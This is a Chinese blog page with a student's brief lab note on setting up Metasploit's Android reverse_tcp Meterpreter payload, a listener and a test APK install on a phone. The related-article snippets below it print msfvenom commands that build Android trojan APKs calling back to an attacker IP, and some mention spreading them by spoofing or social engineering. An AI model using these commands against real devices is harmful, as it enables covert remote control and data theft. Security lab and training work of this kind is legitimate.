Meterpreter在各种操作系统中的应用

最新推荐文章于 2024-05-28 10:57:50 发布
最新推荐文章于 2024-05-28 10:57:50 发布
阅读量251 收藏
点赞数
文章标签: 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/PortugalCR7/article/details/131450997
版权
文章介绍了如何在Metasploit框架中运用Meterpreterpayload,特别是针对Android设备的reverse_tcppayload。首先查找并配置适合安卓的Meterpreter会话,然后设置IP参数,启动主控端。接着,尝试将pentest.apk安装到安卓手机,尽管安装时可能遇到安全警告,但因文件版本问题无法正常打开。这展示了安全测试过程中的一个常见场景。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Meterpreter在各种操作系统中的应用

21网安师1  2021025643137 郭弘凯

首先查找metesploit中可以在安卓运行的meterpreter

我们现在以android/meterpreter/reverse_tcp为例

查看一下本机ip

查看安卓手机ip和路由器ip

设置参数

现在我们启动一个主控端

启动Metasploit

接下来我们把pentset.apk文件安装到手机中,可以看到手机报毒,我们授权其安装

由于是旧版本的apk文件,手机打不开此文件

PortugalCR7
关注
使用Metasploit入侵安卓手机(超详细哦)
chengman3837的博客
03-29 1万+
本文原创作者:newbie,本文属i春秋原创奖励计划,未经许可禁止转载! 1.环境准备: Kali2.0(msfVENOM、metasploit) 安卓手机 2.利用过程: 使用msfvenom生成apk木马 msfvenom -p android/meterpreter/rev...
meterpreter 简单应用
发哥微课堂
01-12 2335
0x00:介绍 使用 metasploit 渗透下一台主机后,并不意味着渗透测试的结束,而接下来需要做的就是后渗透阶段,后渗透阶段在已经拿下目标主机的前提下,进行一系列获取敏感信息、利用这台机器为跳板机做其他主机的攻击等,主要使用的是 metasploit 中的 post 模块,也就是后渗透模块。 metasploit 也提供了一个后渗透的工具,就是 meterpreter,meterpret...
Metasploit - Android meterpreter
Nixawk
02-24 3685
Create a malicious apk fileCreate a malicious apk file (backdoor.apk), and raw is our format to output.msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.108 LPORT=4444 R > backdoor.apkInstall
利用meterpreter生成一个简单的android木马
weixin_30673715的博客
07-21 290
这个学习过程我是在kali linux下进行的,成功的感染了自己的手机,当然了apk包没改签名也没有加小图标,所以只能当是一个实验吧。 首先使用这个命令: 使用这个命令,可以生成一个apk包,但是我在这里标明一下,LHOST的IP写自己网络的IP,LPORT写一个没有被使用的端口,apk包名自己可以随意取。 接下来打开meterpreter软件: 加载模块: 之后设置宿主机的IP和监听端口:...
android实验四apk,Meterpreter之Android APK嵌入攻击实验
weixin_26806355的博客
05-28 906
大家有啥更好的apk远控方法可以一块来交流交流目前我知道的就只有①DroidJack 不免杀②SpyNote 不免杀③CS生成 这个还没试过④meterpreter嵌入apk在先知上看的那篇文章手动修改apk文件总是出错,我弄了一下午没成功,后面直接就用的这个工具。总结步骤在“apkmonk.com”或类似的镜像站点上查找现有的有趣APK应用程序。生成Metasploit APK文件。用“apk...
简单记录自己利用meterpreter入侵安卓
weixin_44731948的博客
01-16 1380
简单记录自己利用meterpreter入侵安卓机 需要准备 一台安卓机 安装kali Linux系统 入侵流程 kali终端执行 msfvenom -p android/meterpreter/reverse_tcp lhost=(kali linux的IP地址) lport=5555 R>/root/a.apk可以看到在root目录下生成了a.apk文件 将apk文件发送到安卓手机(方式自行选择,此处可扩展) 手机安装apk,为了测试成功,还需根据测试目的授予相应权限 kali
如何在Android APK中植入Meterpreter
baimaozi008的博客
05-28 1018
随着移动设备的快速发展,我们日常生活中的许多应用程序正在迁移到云部署,从JavaScript浏览器框架到支持移动设备的前端,例如Apple iOS上的Objective-C,或基于Android的Java。这也促进了手机应用的发展,与Apple不同,Android市场是一种开放的方式,允许任何人为商店做出贡献,而且占据了移动市场份额的大部分。此外,还有各种第三方网站可以直接下载Android应用程序包文件(APK)。
网络安全Meterpreter核心命令详解:涵盖文件系统、网络、系统及用户界面操作的渗透测试工具使用指南
最新发布
04-06
使用场景及目标:①在渗透测试过程中,利用 Meterpreter 提供的强大功能对目标系统进行全面控制与信息收集;②通过执行特定命令实现文件传输、进程管理、网络配置调整、系统信息查询等操作;③借助用户界面命令和...
使用AnDroidInject0r在Android应用中注入Meterpreter有效负载
总结而言,AnDroidInject0r是基于Python的工具,用于将Meterpreter有效负载注入Android应用中,以便在安全测试和评估中提供高级交互式后门。通过Github等平台,安全社区成员可以访问和利用此类工具,与其他安全研究...
渗透测试实战:Meterpreter模块在Windows后渗透中的应用
本篇文档主要介绍了在E026-...本课程深入讲解了如何利用Meterpreter模块在Windows系统中进行后渗透测试,涵盖了从网络配置到攻击工具的使用和参数设置的完整流程,这对于渗透测试人员来说是一次实战能力的提升训练。
Ninjasploit:Meterpreter扩展,用于应用钩子以避免Windows Defender内存扫描
03-08
Meterpreter是一种功能强大的远程控制工具,常用于渗透测试过程中的后续利用,它允许攻击者在目标系统上执行各种操作,如获取系统信息、上传和下载文件、执行命令等。 Windows Defender是Microsoft提供的内置反恶意...
Kali之Metasploit生成apk后门控制安卓
weixin_30689307的博客
02-08 2404
扫盲教程,大佬勿喷。 实验中请更改为你环境的IP。 生成apk后门 Kali Linux(Hack):192.168.169.76 Android(靶机):192.168.169.137 启动kali,开终端,生成apk后门。仅有9.2k的apk,也是蛮吊 root@kali:~# msfvenom -p android/meterpreter/reverse_tcp...
MSF入侵安卓手机
2201_75719295的博客
05-18 5750
里边安装了许许多多的工具。其中MSF就自带有。MSF是Metasploit的简称,Metasploit是一款开源的安全漏洞检测工具,非常强大,分别有Windows版和Linux版,工具里集成了许多微软公布的漏洞(0day)。现在要做的就是把木马文件搞到人家的手机上,思路有很多 可以DNS arp劫持欺骗 只要对方用手机下载文件 就会下载我们的木马文件。这样我们就在/root/路径下生成了一个APK的安卓木马文件,至于木马的免杀暂且不谈。还有社工什么等等的,这里我就简单的把木马文件弄我自己的手机上做测试。
kali安卓手机木马远控
热门推荐
m0_65606241的博客
05-06 1万+
得到kali本机IP,设置端口 利用msf payload模块生成木马 命令:msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.174.129 lport=5555 R > 1.apk 木马生成后 开启我们的监听模块msfconsole 进入控制端后,设置一个安卓的playload(之前使用过的) 设置监听kali虚拟机的ip地址和端口号(与之前生成apk木马文件的命令参数相同) run启用,等待木马..
msf渗透测试学习-与永恒之蓝漏洞案例
weixin_49349476的博客
06-08 5284
MSF是Metasploit Framework的缩写,是一款广泛使用的渗透测试工具,具有强大的攻击功能。它提供了一个模块化的平台,通过将各种攻击载荷、漏洞利用和辅助工具组装在一起,可用于模拟各种攻击,测试系统安全性,也可以用于执行红队实战训练、漏洞挖掘等工作。
Metasploit后门攻击android
2301_77778745的博客
04-26 518
之后攻击便完成了,这时候返回一个meterpreter可以执行各种命令,可以通过’?‘来进行辅助获得更多的帮助信息。接着在终端里输入/etc/init.d/apache2 start 启动apache服务。/var/www/html是生成木马的路径,也是kali 2.0的web服务器路径。注意要把LHOST 和LPORT 设置成刚才配置木马程序的IP和端口。确认无误后,便可以开始监听,使用。LHOST对应的是本机的ip地址。LPORT对于你要监听的端口。
我的MSF之Android木马渗透的学习笔记
yuan_boss的博客
06-07 5948
使用kali制作Android木马并进行通讯录渗透的学习笔记
Kali Linux 如何破解 Android 手机
Android 开发架构
06-16 4444
出现meterpreter提示:
使用Metasploit在Android端进行渗透测试
weixin_64647213的博客
02-10 2118
记一次对于android的安全测试,细节更多,适合小白
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值